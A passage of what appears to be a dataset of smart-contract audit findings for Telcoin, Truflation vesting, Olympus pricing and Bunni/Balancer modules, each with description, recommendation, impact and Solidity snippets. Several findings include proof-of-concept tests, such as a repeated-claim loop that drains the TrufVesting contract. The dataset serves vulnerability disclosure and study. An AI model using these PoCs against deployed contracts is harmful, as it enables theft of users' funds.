misalignment\\n+ await expect(councilMember.burn(1, support.address)).emit(councilMember, ""Transfer"");\\n+\\n+ // Impact 1. holder with tokenId > balances length cannot claim\\n+ await expect(councilMember.connect(lastCouncilMember).claim(3, 1)).to.revertedWithPanic(""0x32""); // @audit-info 0x32: Array accessed at an out-of-bounds or negative index\\n+\\n+ // Impact 2. subsequent burns of tokenId > balances length will revert\\n+ await expect(councilMember.burn(3, lastCouncilMember.address)).to.revertedWithPanic(""0x32""); \\n+\\n+ // Impact 3. subsequent mint will revert due to tokenId collision\\n+ await expect(councilMember.mint(lastCouncilMember.address)).to.revertedWithCustomError(councilMember, ""ERC721InvalidSender"");\\n+\\n+ });\\n });\\n });\\n \\n```\\n\\nResult\\nCouncilMember mutative burn Success ✔ inoperable contract after burn (90ms) 1 passing (888ms)\\nThe Passing execution of the POC confirmed that operations such as `claim`, `burn` & `mint` were all reverted which make the contract inoperable.","It is recommended to avoid popping out balances to keep alignment with uniquely minted tokenId. Alternatively, consider migrating to ERC1155, which inherently manages a built-in balance for each NFT.",The severity of the vulnerability is high due to the high likelihood of occurence and the critical impacts on the contract's operability and token holders' ability to interact with their assets.,"```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function burn(\\n // rest of code\\n balances.pop(); // <= FOUND: balances.length decreases, while latest minted nft withold its unique tokenId\\n _burn(tokenId);\\n }\\n```\\n" +Users can fully drain the `TrufVesting` contract,high,"Due to flaw in the logic in `claimable` any arbitrary user can drain all the funds within the contract.\\nA user's claimable is calculated in the following way:\\nUp until start time it is 0.\\nBetween start time and cliff time it's equal to `initialRelease`.\\nAfter cliff time, it linearly increases until the full period ends.\\nHowever, if we look at the code, when we are at stage 2., it always returns `initialRelease`, even if we've already claimed it. This would allow for any arbitrary user to call claim as many times as they wish and every time they'd receive `initialRelease`. Given enough iterations, any user can drain the contract.\\n```\\n function claimable(uint256 categoryId, uint256 vestingId, address user)\\n public\\n view\\n returns (uint256 claimableAmount)\\n {\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n VestingInfo memory info = vestingInfos[categoryId][vestingId];\\n\\n uint64 startTime = userVesting.startTime + info.initialReleasePeriod;\\n\\n if (startTime > block.timestamp) {\\n return 0;\\n }\\n\\n uint256 totalAmount = userVesting.amount;\\n\\n uint256 initialRelease = (totalAmount * info.initialReleasePct) / DENOMINATOR;\\n\\n startTime += info.cliff;\\n\\n if (startTime > block.timestamp) {\\n return initialRelease;\\n }\\n```\\n\\n```\\n function claim(address user, uint256 categoryId, uint256 vestingId, uint256 claimAmount) public {\\n if (user != msg.sender && (!categories[categoryId].adminClaimable || msg.sender != owner())) {\\n revert Forbidden(msg.sender);\\n }\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (claimAmount == type(uint256).max) {\\n claimAmount = claimableAmount;\\n } else if (claimAmount > claimableAmount) {\\n revert ClaimAmountExceed();\\n }\\n if (claimAmount == 0) {\\n revert ZeroAmount();\\n }\\n\\n categories[categoryId].totalClaimed += claimAmount;\\n userVestings[categoryId][vestingId][user].claimed += claimAmount;\\n trufToken.safeTransfer(user, claimAmount);\\n\\n emit Claimed(categoryId, vestingId, user, claimAmount);\\n }\\n```\\n","change the if check to the following\\n```\\n if (startTime > block.timestamp) {\\n if (initialRelease > userVesting.claimed) {\\n return initialRelease - userVesting.claimed;\\n }\\n else { return 0; } \\n }\\n```\\n\\nPoC\\n```\\n function test_cliffVestingDrain() public { \\n _setupVestingPlan();\\n uint256 categoryId = 2;\\n uint256 vestingId = 0;\\n uint256 stakeAmount = 10e18;\\n uint256 duration = 30 days;\\n\\n vm.startPrank(owner);\\n \\n vesting.setUserVesting(categoryId, vestingId, alice, 0, stakeAmount);\\n\\n vm.warp(block.timestamp + 11 days); // warping 11 days, because initial release period is 10 days\\n // and cliff is at 20 days. We need to be in the middle \\n vm.startPrank(alice);\\n assertEq(trufToken.balanceOf(alice), 0);\\n vesting.claim(alice, categoryId, vestingId, type(uint256).max);\\n \\n uint256 balance = trufToken.balanceOf(alice);\\n assertEq(balance, stakeAmount * 5 / 100); // Alice should be able to have claimed just 5% of the vesting \\n\\n for (uint i; i < 39; i++ ){ \\n vesting.claim(alice, categoryId, vestingId, type(uint256).max);\\n }\\n uint256 newBalance = trufToken.balanceOf(alice); // Alice has claimed 2x the amount she was supposed to be vested. \\n assertEq(newBalance, stakeAmount * 2); // In fact she can keep on doing this to drain the whole contract\\n }\\n```\\n",Any user can drain the contract,"```\\n function claimable(uint256 categoryId, uint256 vestingId, address user)\\n public\\n view\\n returns (uint256 claimableAmount)\\n {\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n VestingInfo memory info = vestingInfos[categoryId][vestingId];\\n\\n uint64 startTime = userVesting.startTime + info.initialReleasePeriod;\\n\\n if (startTime > block.timestamp) {\\n return 0;\\n }\\n\\n uint256 totalAmount = userVesting.amount;\\n\\n uint256 initialRelease = (totalAmount * info.initialReleasePct) / DENOMINATOR;\\n\\n startTime += info.cliff;\\n\\n if (startTime > block.timestamp) {\\n return initialRelease;\\n }\\n```\\n" +"`cancelVesting` will potentially not give users unclaimed, vested funds, even if giveUnclaimed = true",high,"The purpose of `cancelVesting` is to cancel a vesting grant and potentially give users unclaimed but vested funds in the event that `giveUnclaimed = true`. However, due to a bug, in the event that the user had staked / locked funds, they will potentially not received the unclaimed / vested funds even if `giveUnclaimed = true`.\\nHere's the cancelVesting function in TrufVesting:\\n```\\nfunction cancelVesting(uint256 categoryId, uint256 vestingId, address user, bool giveUnclaimed)\\n external\\n onlyOwner\\n{\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n if (userVesting.amount == 0) {\\n revert UserVestingDoesNotExists(categoryId, vestingId, user);\\n }\\n\\n if (userVesting.startTime + vestingInfos[categoryId][vestingId].period <= block.timestamp) {\\n revert AlreadyVested(categoryId, vestingId, user);\\n }\\n\\n uint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\n if (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n }\\n\\n VestingCategory storage category = categories[categoryId];\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (giveUnclaimed && claimableAmount != 0) {\\n trufToken.safeTransfer(user, claimableAmount);\\n\\n userVesting.claimed += claimableAmount;\\n category.totalClaimed += claimableAmount;\\n emit Claimed(categoryId, vestingId, user, claimableAmount);\\n }\\n\\n uint256 unvested = userVesting.amount - userVesting.claimed;\\n\\n delete userVestings[categoryId][vestingId][user];\\n\\n category.allocated -= unvested;\\n\\n emit CancelVesting(categoryId, vestingId, user, giveUnclaimed);\\n}\\n```\\n\\nFirst, consider the following code:\\n```\\nuint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\nif (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n}\\n```\\n\\nFirst the locked / staked funds will essentially be un-staked. The following line of code: `userVesting.locked = 0;` exists because there is a call to `uint256 claimableAmount = claimable(categoryId, vestingId, user);` afterwards, and in the event that there were locked funds that were unstaked, these funds should now potentially be `claimable` if they are vested (but if locked is not set to 0, then the vested funds will potentially not be deemed `claimable` by the `claimable` function).\\nHowever, because `userVesting` is `memory` rather than `storage`, this doesn't end up happening (so `userVesting.locked = 0;` is actually a bug). This means that if a user is currently staking all their funds (so all their funds are locked), and `cancelVesting` is called, then they will not receive any funds back even if `giveUnclaimed = true`. This is because the `claimable` function (which will access the unaltered userVestings[categoryId][vestingId][user]) will still think that all the funds are currently locked, even though they are not as they have been forcibly unstaked.",Change `userVesting.locked = 0;` to `userVestings[categoryId][vestingId][user].locked = 0;`,"When `cancelVesting` is called, a user may not receive their unclaimed, vested funds.","```\\nfunction cancelVesting(uint256 categoryId, uint256 vestingId, address user, bool giveUnclaimed)\\n external\\n onlyOwner\\n{\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n if (userVesting.amount == 0) {\\n revert UserVestingDoesNotExists(categoryId, vestingId, user);\\n }\\n\\n if (userVesting.startTime + vestingInfos[categoryId][vestingId].period <= block.timestamp) {\\n revert AlreadyVested(categoryId, vestingId, user);\\n }\\n\\n uint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\n if (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n }\\n\\n VestingCategory storage category = categories[categoryId];\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (giveUnclaimed && claimableAmount != 0) {\\n trufToken.safeTransfer(user, claimableAmount);\\n\\n userVesting.claimed += claimableAmount;\\n category.totalClaimed += claimableAmount;\\n emit Claimed(categoryId, vestingId, user, claimableAmount);\\n }\\n\\n uint256 unvested = userVesting.amount - userVesting.claimed;\\n\\n delete userVestings[categoryId][vestingId][user];\\n\\n category.allocated -= unvested;\\n\\n emit CancelVesting(categoryId, vestingId, user, giveUnclaimed);\\n}\\n```\\n" +When migrating the owner users will lose their rewards,medium,"When a user migrates the owner due to a lost private key, the rewards belonging to the previous owner remain recorded in their account and cannot be claimed, resulting in the loss of user rewards.\\nAccording to the documentation, `migrateUser()` is used when a user loses their private key to migrate the old vesting owner to a new owner.\\n```\\n /**\\n * @notice Migrate owner of vesting. Used when user lost his private key\\n * @dev Only admin can migrate users vesting\\n * @param categoryId Category id\\n * @param vestingId Vesting id\\n * @param prevUser previous user address\\n * @param newUser new user address\\n */\\n```\\n\\nIn this function, the protocol calls `migrateVestingLock()` to obtain a new ID.\\n```\\n if (lockupId != 0) {\\n newLockupId = veTRUF.migrateVestingLock(prevUser, newUser, lockupId - 1) + 1;\\n lockupIds[categoryId][vestingId][newUser] = newLockupId;\\n delete lockupIds[categoryId][vestingId][prevUser];\\n\\n newVesting.locked = prevVesting.locked;\\n }\\n```\\n\\nHowever, in the `migrateVestingLock()` function, the protocol calls `stakingRewards.withdraw()` to withdraw the user's stake, burning points. In the `withdraw()` function, the protocol first calls `updateReward()` to update the user's rewards and records them in the user's account.\\n```\\n function withdraw(address user, uint256 amount) public updateReward(user) onlyOperator {\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n _totalSupply -= amount;\\n _balances[user] -= amount;\\n emit Withdrawn(user, amount);\\n }\\n```\\n\\nHowever, `stakingRewards.withdraw()` is called with the old owner as a parameter, meaning that the rewards will be updated on the old account.\\n```\\n uint256 points = oldLockup.points;\\n stakingRewards.withdraw(oldUser, points);\\n _burn(oldUser, points);\\n```\\n\\nAs mentioned earlier, the old owner has lost their private key and cannot claim the rewards, resulting in the loss of these rewards.","When migrating the owner, the rewards belonging to the previous owner should be transferred to the new owner.",The user's rewards are lost,```\\n /**\\n * @notice Migrate owner of vesting. Used when user lost his private key\\n * @dev Only admin can migrate users vesting\\n * @param categoryId Category id\\n * @param vestingId Vesting id\\n * @param prevUser previous user address\\n * @param newUser new user address\\n */\\n```\\n +Ended locks can be extended,medium,"When a lock period ends, it can be extended. If the new extension 'end' is earlier than the current block.timestamp, the user will have a lock that can be unstaked at any time.""\\nWhen the lock period ends, the owner of the expired lock can extend it to set a new lock end that is earlier than the current block.timestamp. By doing so, the lock owner can create a lock that is unstakeable at any time.\\nThis is doable because there are no checks in the extendLock function that checks whether the lock is already ended or not.\\nPoC:\\n```\\nfunction test_ExtendLock_AlreadyEnded() external {\\n uint256 amount = 100e18;\\n uint256 duration = 5 days;\\n\\n _stake(amount, duration, alice, alice);\\n\\n // 5 days later, lock is ended for Alice\\n skip(5 days + 1);\\n\\n (,, uint128 _ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock is indeed ended\\n assertTrue(_ends < block.timestamp, ""lock is ended"");\\n\\n // 36 days passed \\n skip(36 days);\\n\\n // Alice extends her already finished lock 30 more days\\n vm.prank(alice);\\n veTRUF.extendLock(0, 30 days);\\n\\n (,,_ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock can be easily unlocked right away\\n assertTrue(_ends < block.timestamp, ""lock is ended"");\\n\\n // Alice unstakes her lock, basically alice can unstake her lock anytime she likes\\n vm.prank(alice);\\n veTRUF.unstake(0);\\n }\\n```\\n",Do not let extension of locks that are already ended.,"The owner of the lock will achieve points that he can unlock anytime. This is clearly a gaming of the system and shouldn't be acceptable behaviour. A locker having a ""lock"" that can be unstaked anytime will be unfair for the other lockers. Considering this, I'll label this as high.","```\\nfunction test_ExtendLock_AlreadyEnded() external {\\n uint256 amount = 100e18;\\n uint256 duration = 5 days;\\n\\n _stake(amount, duration, alice, alice);\\n\\n // 5 days later, lock is ended for Alice\\n skip(5 days + 1);\\n\\n (,, uint128 _ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock is indeed ended\\n assertTrue(_ends < block.timestamp, ""lock is ended"");\\n\\n // 36 days passed \\n skip(36 days);\\n\\n // Alice extends her already finished lock 30 more days\\n vm.prank(alice);\\n veTRUF.extendLock(0, 30 days);\\n\\n (,,_ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock can be easily unlocked right away\\n assertTrue(_ends < block.timestamp, ""lock is ended"");\\n\\n // Alice unstakes her lock, basically alice can unstake her lock anytime she likes\\n vm.prank(alice);\\n veTRUF.unstake(0);\\n }\\n```\\n" +OlympusPrice.v2.sol#storePrice: The moving average prices are used recursively for the calculation of the moving average price.,high,"The moving average prices should be calculated by only oracle feed prices. But now, they are calculated by not only oracle feed prices but also moving average price recursively.\\nThat is, the `storePrice` function uses the current price obtained from the `_getCurrentPrice` function to update the moving average price. However, in the case of `asset.useMovingAverage = true`, the `_getCurrentPrice` function computes the current price using the moving average price.\\nThus, the moving average prices are used recursively to calculate moving average price, so the current prices will be obtained incorrectly.\\n`OlympusPrice.v2.sol#storePrice` function is the following.\\n```\\n function storePrice(address asset_) public override permissioned {\\n Asset storage asset = _assetData[asset_];\\n\\n // Check if asset is approved\\n if (!asset.approved) revert PRICE_AssetNotApproved(asset_);\\n\\n // Get the current price for the asset\\n (uint256 price, uint48 currentTime) = _getCurrentPrice(asset_);\\n\\n // Store the data in the obs index\\n uint256 oldestPrice = asset.obs[asset.nextObsIndex];\\n asset.obs[asset.nextObsIndex] = price;\\n\\n // Update the last observation time and increment the next index\\n asset.lastObservationTime = currentTime;\\n asset.nextObsIndex = (asset.nextObsIndex + 1) % asset.numObservations;\\n\\n // Update the cumulative observation, if storing the moving average\\n if (asset.storeMovingAverage)\\n asset.cumulativeObs = asset.cumulativeObs + price - oldestPrice;\\n\\n // Emit event\\n emit PriceStored(asset_, price, currentTime);\\n }\\n```\\n\\n`L319` obtain the current price for the asset by calling the `_getCurrentPrice` function and use it to update `asset.cumulativeObs` in `L331`. The `_getCurrentPrice` function is the following.\\n```\\n function _getCurrentPrice(address asset_) internal view returns (uint256, uint48) {\\n Asset storage asset = _assetData[asset_];\\n\\n // Iterate through feeds to get prices to aggregate with strategy\\n Component[] memory feeds = abi.decode(asset.feeds, (Component[]));\\n uint256 numFeeds = feeds.length;\\n uint256[] memory prices = asset.useMovingAverage\\n ? new uint256[](numFeeds + 1)\\n : new uint256[](numFeeds);\\n uint8 _decimals = decimals; // cache in memory to save gas\\n for (uint256 i; i < numFeeds; ) {\\n (bool success_, bytes memory data_) = address(_getSubmoduleIfInstalled(feeds[i].target))\\n .staticcall(\\n abi.encodeWithSelector(feeds[i].selector, asset_, _decimals, feeds[i].params)\\n );\\n\\n // Store price if successful, otherwise leave as zero\\n // Idea is that if you have several price calls and just\\n // one fails, it'll DOS the contract with this revert.\\n // We handle faulty feeds in the strategy contract.\\n if (success_) prices[i] = abi.decode(data_, (uint256));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // If moving average is used in strategy, add to end of prices array\\n if (asset.useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n\\n // If there is only one price, ensure it is not zero and return\\n // Otherwise, send to strategy to aggregate\\n if (prices.length == 1) {\\n if (prices[0] == 0) revert PRICE_PriceZero(asset_);\\n return (prices[0], uint48(block.timestamp));\\n } else {\\n // Get price from strategy\\n Component memory strategy = abi.decode(asset.strategy, (Component));\\n (bool success, bytes memory data) = address(_getSubmoduleIfInstalled(strategy.target))\\n .staticcall(abi.encodeWithSelector(strategy.selector, prices, strategy.params));\\n\\n // Ensure call was successful\\n if (!success) revert PRICE_StrategyFailed(asset_, data);\\n\\n // Decode asset price\\n uint256 price = abi.decode(data, (uint256));\\n\\n // Ensure value is not zero\\n if (price == 0) revert PRICE_PriceZero(asset_);\\n\\n return (price, uint48(block.timestamp));\\n }\\n }\\n```\\n\\nAs can be seen, when `asset.useMovingAverage = true`, the `_getCurrentPrice` calculates the current `price` `price` using the moving average `price` obtained by `asset.cumulativeObs / asset.numObservations` in `L160`.\\nSo the `price` value in `L331` is obtained from not only oracle feed prices but also moving average `price`. Then, `storePrice` calculates the cumulative observations asset.cumulativeObs = asset.cumulativeObs + `price` - oldestPrice using the `price` which is obtained incorrectly above.\\nThus, the moving average prices are used recursively for the calculation of the moving average price.","When updating the current price and cumulative observations in the `storePrice` function, it should use the oracle price feeds and not include the moving average prices. So, instead of using the `asset.useMovingAverage` state variable in the `_getCurrentPrice` function, we can add a `useMovingAverage` parameter as the following.\\n```\\n function _getCurrentPrice(address asset_, bool useMovingAverage) internal view returns (uint256, uint48) {\\n Asset storage asset = _assetData[asset_];\\n\\n // Iterate through feeds to get prices to aggregate with strategy\\n Component[] memory feeds = abi.decode(asset.feeds, (Component[]));\\n uint256 numFeeds = feeds.length;\\n uint256[] memory prices = useMovingAverage\\n ? new uint256[](numFeeds + 1)\\n : new uint256[](numFeeds);\\n uint8 _decimals = decimals; // cache in memory to save gas\\n for (uint256 i; i < numFeeds; ) {\\n (bool success_, bytes memory data_) = address(_getSubmoduleIfInstalled(feeds[i].target))\\n .staticcall(\\n abi.encodeWithSelector(feeds[i].selector, asset_, _decimals, feeds[i].params)\\n );\\n\\n // Store price if successful, otherwise leave as zero\\n // Idea is that if you have several price calls and just\\n // one fails, it'll DOS the contract with this revert.\\n // We handle faulty feeds in the strategy contract.\\n if (success_) prices[i] = abi.decode(data_, (uint256));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // If moving average is used in strategy, add to end of prices array\\n if (useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n\\n // If there is only one price, ensure it is not zero and return\\n // Otherwise, send to strategy to aggregate\\n if (prices.length == 1) {\\n if (prices[0] == 0) revert PRICE_PriceZero(asset_);\\n return (prices[0], uint48(block.timestamp));\\n } else {\\n // Get price from strategy\\n Component memory strategy = abi.decode(asset.strategy, (Component));\\n (bool success, bytes memory data) = address(_getSubmoduleIfInstalled(strategy.target))\\n .staticcall(abi.encodeWithSelector(strategy.selector, prices, strategy.params));\\n\\n // Ensure call was successful\\n if (!success) revert PRICE_StrategyFailed(asset_, data);\\n\\n // Decode asset price\\n uint256 price = abi.decode(data, (uint256));\\n\\n // Ensure value is not zero\\n if (price == 0) revert PRICE_PriceZero(asset_);\\n\\n return (price, uint48(block.timestamp));\\n }\\n }\\n```\\n\\nThen we should set `useMovingAverage = false` to call `_getCurrentPrice` function only in the `storePrice` function. In other cases, we should set `useMovingAverage = asset.useMovingAverage` to call `_getCurrentPrice` function.","Now the moving average prices are used recursively for the calculation of the moving average price. Then, the moving average prices become more smoothed than the intention of the administrator. That is, even when the actual price fluctuations are large, the price fluctuations of `_getCurrentPrice` function will become too small.\\nMoreover, even though all of the oracle price feeds fails, the moving averge prices will be calculated only by moving average prices.\\nThus the current prices will become incorrect. If `_getCurrentPrice` function value is miscalculated, it will cause fatal damage to the protocol.","```\\n function storePrice(address asset_) public override permissioned {\\n Asset storage asset = _assetData[asset_];\\n\\n // Check if asset is approved\\n if (!asset.approved) revert PRICE_AssetNotApproved(asset_);\\n\\n // Get the current price for the asset\\n (uint256 price, uint48 currentTime) = _getCurrentPrice(asset_);\\n\\n // Store the data in the obs index\\n uint256 oldestPrice = asset.obs[asset.nextObsIndex];\\n asset.obs[asset.nextObsIndex] = price;\\n\\n // Update the last observation time and increment the next index\\n asset.lastObservationTime = currentTime;\\n asset.nextObsIndex = (asset.nextObsIndex + 1) % asset.numObservations;\\n\\n // Update the cumulative observation, if storing the moving average\\n if (asset.storeMovingAverage)\\n asset.cumulativeObs = asset.cumulativeObs + price - oldestPrice;\\n\\n // Emit event\\n emit PriceStored(asset_, price, currentTime);\\n }\\n```\\n" +Incorrect ProtocolOwnedLiquidityOhm calculation due to inclusion of other user's reserves,high,"ProtocolOwnedLiquidityOhm for Bunni can include the liquidity deposited by other users which is not protocol owned\\nThe protocol owned liquidity in Bunni is calculated as the sum of reserves of all the BunniTokens\\n```\\n function getProtocolOwnedLiquidityOhm() external view override returns (uint256) {\\n\\n uint256 len = bunniTokens.length;\\n uint256 total;\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(tokenData.token);\\n\\n // rest of code// rest of code// rest of code\\n\\n total += _getOhmReserves(key, lens);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return total;\\n }\\n```\\n\\nThe deposit function of Bunni allows any user to add liquidity to a token. Hence the returned reserve will contain amounts other than the reserves that actually belong to the protocol\\n```\\n // @audit callable by any user\\n function deposit(\\n DepositParams calldata params\\n )\\n external\\n payable\\n virtual\\n override\\n checkDeadline(params.deadline)\\n returns (uint256 shares, uint128 addedLiquidity, uint256 amount0, uint256 amount1)\\n {\\n }\\n```\\n",Guard the deposit function in BunniHub or compute the liquidity using shares belonging to the protocol,Incorrect assumption of the protocol owned liquidity and hence the supply. An attacker can inflate the liquidity reserves The wider system relies on the supply calculation to be correct in order to perform actions of economical impact,"```\\n function getProtocolOwnedLiquidityOhm() external view override returns (uint256) {\\n\\n uint256 len = bunniTokens.length;\\n uint256 total;\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(tokenData.token);\\n\\n // rest of code// rest of code// rest of code\\n\\n total += _getOhmReserves(key, lens);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return total;\\n }\\n```\\n" +Incorrect StablePool BPT price calculation,high,"Incorrect StablePool BPT price calculation as rate's are not considered\\nThe price of a stable pool BPT is computed as:\\nminimum price among the pool tokens obtained via feeds * return value of `getRate()`\\nThis method is used referring to an old documentation of Balancer\\n```\\n function getStablePoolTokenPrice(\\n address,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n // Prevent overflow\\n if (outputDecimals_ > BASE_10_MAX_EXPONENT)\\n revert Balancer_OutputDecimalsOutOfBounds(outputDecimals_, BASE_10_MAX_EXPONENT);\\n\\n\\n address[] memory tokens;\\n uint256 poolRate; // pool decimals\\n uint8 poolDecimals;\\n bytes32 poolId;\\n {\\n\\n // rest of code// rest of code\\n\\n // Get tokens in the pool from vault\\n (address[] memory tokens_, , ) = balVault.getPoolTokens(poolId);\\n tokens = tokens_;\\n\\n // Get rate\\n try pool.getRate() returns (uint256 rate_) {\\n if (rate_ == 0) {\\n revert Balancer_PoolStableRateInvalid(poolId, 0);\\n }\\n\\n\\n poolRate = rate_;\\n\\n // rest of code// rest of code\\n\\n uint256 minimumPrice; // outputDecimals_\\n {\\n /**\\n * The Balancer docs do not currently state this, but a historical version noted\\n * that getRate() should be multiplied by the minimum price of the tokens in the\\n * pool in order to get a valuation. This is the same approach as used by Curve stable pools.\\n */\\n for (uint256 i; i < len; i++) {\\n address token = tokens[i];\\n if (token == address(0)) revert Balancer_PoolTokenInvalid(poolId, i, token);\\n\\n (uint256 price_, ) = _PRICE().getPrice(token, PRICEv2.Variant.CURRENT); // outputDecimals_\\n\\n\\n if (minimumPrice == 0) {\\n minimumPrice = price_;\\n } else if (price_ < minimumPrice) {\\n minimumPrice = price_;\\n }\\n }\\n }\\n\\n uint256 poolValue = poolRate.mulDiv(minimumPrice, 10 ** poolDecimals); // outputDecimals_\\n```\\n\\nThe `getRate()` function returns the exchange `rate` of a BPT to the underlying base asset of the pool which can be different from the minimum market priced asset for pools with `rateProviders`. To consider this, the price obtained from feeds must be divided by the `rate` provided by `rateProviders` before choosing the minimum as mentioned in the previous version of Balancer's documentation.\\n1. Get market price for each constituent token\\nGet market price of wstETH and WETH in terms of USD, using chainlink oracles.\\n2. Get RateProvider price for each constituent token\\nSince wstETH - WETH pool is a MetaStablePool and not a ComposableStablePool, it does not have `getTokenRate()` function. Therefore, it`s needed to get the RateProvider price manually for wstETH, using the rate providers of the pool. The rate provider will return the wstETH token in terms of stETH.\\nNote that WETH does not have a rate provider for this pool. In that case, assume a value of `1e18` (it means, market price of WETH won't be divided by any value, and it's used purely in the minPrice formula).\\n3. Get minimum price\\n$$ minPrice = min({P_{M_{wstETH}} \\over P_{RP_{wstETH}}}, P_{M_{WETH}}) $$\\n4. Calculates the BPT price\\n$$ P_{BPT_{wstETH-WETH}} = minPrice * rate_{pool_{wstETH-WETH}} $$\\nwhere `rate_pool_wstETH-WETH` is `pool.getRate()` of wstETH-WETH pool.\\nExample\\nAt block 18821323: cbeth : 2317.48812 wstEth : 2526.84 pool total supply : 0.273259897168240633 getRate() : 1.022627523581711856 wstRateprovider rate : 1.150725009180224306 cbEthRateProvider rate : 1.058783029570983377 wstEth balance : 0.133842314907166538 cbeth balance : 0.119822100236557012 tvl : (0.133842314907166538 * 2526.84 + 0.119822100236557012 * 2317.48812) == 615.884408812\\naccording to current implementation: bpt price = 2317.48812 * 1.022627523581711856 == 2369.927137086 calculated tvl = bpt price * total supply = 647.606045776\\ncorrect calculation: rate_provided_adjusted_cbeth = (2317.48812 / 1.058783029570983377) == 2188.822502132 rate_provided_adjusted_wsteth = (2526.84 / 1.150725009180224306) == 2195.867804942 bpt price = 2188.822502132 * 1.022627523581711856 == 2238.350134915 calculated tvl = bpt price * total supply = (2238.350134915 * 0.273259897168240633) == 611.651327693","For pools having rate providers, divide prices by rate before choosing the minimum",Incorrect calculation of bpt price. Has possibility to be over and under valued.,"```\\n function getStablePoolTokenPrice(\\n address,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n // Prevent overflow\\n if (outputDecimals_ > BASE_10_MAX_EXPONENT)\\n revert Balancer_OutputDecimalsOutOfBounds(outputDecimals_, BASE_10_MAX_EXPONENT);\\n\\n\\n address[] memory tokens;\\n uint256 poolRate; // pool decimals\\n uint8 poolDecimals;\\n bytes32 poolId;\\n {\\n\\n // rest of code// rest of code\\n\\n // Get tokens in the pool from vault\\n (address[] memory tokens_, , ) = balVault.getPoolTokens(poolId);\\n tokens = tokens_;\\n\\n // Get rate\\n try pool.getRate() returns (uint256 rate_) {\\n if (rate_ == 0) {\\n revert Balancer_PoolStableRateInvalid(poolId, 0);\\n }\\n\\n\\n poolRate = rate_;\\n\\n // rest of code// rest of code\\n\\n uint256 minimumPrice; // outputDecimals_\\n {\\n /**\\n * The Balancer docs do not currently state this, but a historical version noted\\n * that getRate() should be multiplied by the minimum price of the tokens in the\\n * pool in order to get a valuation. This is the same approach as used by Curve stable pools.\\n */\\n for (uint256 i; i < len; i++) {\\n address token = tokens[i];\\n if (token == address(0)) revert Balancer_PoolTokenInvalid(poolId, i, token);\\n\\n (uint256 price_, ) = _PRICE().getPrice(token, PRICEv2.Variant.CURRENT); // outputDecimals_\\n\\n\\n if (minimumPrice == 0) {\\n minimumPrice = price_;\\n } else if (price_ < minimumPrice) {\\n minimumPrice = price_;\\n }\\n }\\n }\\n\\n uint256 poolValue = poolRate.mulDiv(minimumPrice, 10 ** poolDecimals); // outputDecimals_\\n```\\n" +Inconsistency in BunniToken Price Calculation,medium,"The deviation check (_validateReserves()) from BunniPrice.sol considers both position reserves and uncollected fees when validating the deviation with TWAP, while the final price calculation (_getTotalValue()) only accounts for position reserves, excluding uncollected fees.\\nThe same is applied to BunniSupply.sol where `getProtocolOwnedLiquidityOhm()` validates reserves + fee deviation from TWAP and then returns only Ohm reserves using `lens_.getReserves(key_)`\\nNote that `BunniSupply.sol#getProtocolOwnedLiquidityReserves()` validates deviation using reserves+fees with TWAP and then return reserves+fees in a good way without discrepancy.\\nBut this could lead to a misalignment between the deviation check and actual price computation.\\nDeviation Check : `_validateReserves` Function:\\n```\\n### BunniPrice.sol and BunniSupply.sol : \\n function _validateReserves( BunniKey memory key_,BunniLens lens_,uint16 twapMaxDeviationBps_,uint32 twapObservationWindow_) internal view \\n {\\n uint256 reservesTokenRatio = BunniHelper.getReservesRatio(key_, lens_);\\n uint256 twapTokenRatio = UniswapV3OracleHelper.getTWAPRatio(address(key_.pool),twapObservationWindow_);\\n\\n // Revert if the relative deviation is greater than the maximum.\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n reservesTokenRatio,\\n twapTokenRatio,\\n twapMaxDeviationBps_,\\n TWAP_MAX_DEVIATION_BASE\\n )\\n ) {\\n revert BunniPrice_PriceMismatch(address(key_.pool), twapTokenRatio, reservesTokenRatio);\\n }\\n }\\n\\n### BunniHelper.sol : \\n function getReservesRatio(BunniKey memory key_, BunniLens lens_) public view returns (uint256) {\\n IUniswapV3Pool pool = key_.pool;\\n uint8 token0Decimals = ERC20(pool.token0()).decimals();\\n\\n (uint112 reserve0, uint112 reserve1) = lens_.getReserves(key_);\\n \\n //E compute fees and return values \\n (uint256 fee0, uint256 fee1) = lens_.getUncollectedFees(key_);\\n 